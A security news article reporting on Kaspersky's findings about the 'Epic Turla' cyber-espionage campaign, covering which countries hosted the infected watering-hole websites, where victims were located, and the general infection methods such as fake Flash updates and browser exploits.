14 DAY TRIAL // Security experts analyzing a cyber-espionage campaign found that the largest number of websites infected with malware that leads to distributing the Turla Trojan were administrated by the Romanian Government.
Named by Kaspersky researchers “Epic Turla,” the espionage campaign that relies on the Turla toolkit (also known as Snake or Uroburos) distributes the spying component through spear-phishing and watering hole attacks.
It seems that in the case of the latter, in a classification per country, Romania is at the top of the list with 17 websites injected with the malware-serving code. This by far is the largest number of infections, since the next most affected country, Switzerland, recorded almost half the amount, nine.
The Kaspersky report says that “distribution is obviously not random, and it reflects some of the interests of the attackers.” As far as Romania is concerned, many of the compromised sites are in the Mures region.
Costin Raiu, head of the global Research and analysis team at Kaspersky, told us via Twitter that other websites infected are from entities in the North-West part of the country, but there is no information on why these presented an interest to the attackers.
The security company said that one method to infect the websites could be by abusing the TYPO3 CMS (content management system), which seems to be the most prevalent platform; the compromised location loads a remote JavaScript into the victim's browser, which redirects to an exploitation PHP script.
Vulnerabilities in Java, Adobe Flash Player and Internet Explorer have also been seen by security researchers to be leveraged during the campaign.
Another technique to infect the victim’s computer is tricking the user into executing a fake update for Adobe Flash. Researchers also have evidence that the threat actors tried to push a fake Microsoft Security Essentials application to users. This social engineering tactic has been observed to be combined with the watering hole attack.
The large number of infected websites in Romania does not necessarily mean that most of the victims are also from this country. The statistics from Kaspersky put France at the top of the list, with infections being reported for 25 IP addresses. Next in line is the United States with 24 infections, while Iran falls in third place, with a total of 22 infections.
In this top, Romania is on the seventh place, with 15 compromised addresses.
Epic Turla is a sophisticated cyber-espionage operation that has been recently analyzed by researchers from multiple security entities, like Kaspersky, Symantec, and CrySyS Lab in Budapest.
However, other security companies have gleaned into the operation in the past, such as G Data and BAE Systems.
The operation is far from being new, as the first sample was recorded four years ago, in 2010. However, despite efforts to disrupt its activity, Turla operators managed to make the espionage toolkit more sophisticated and continue their activity.
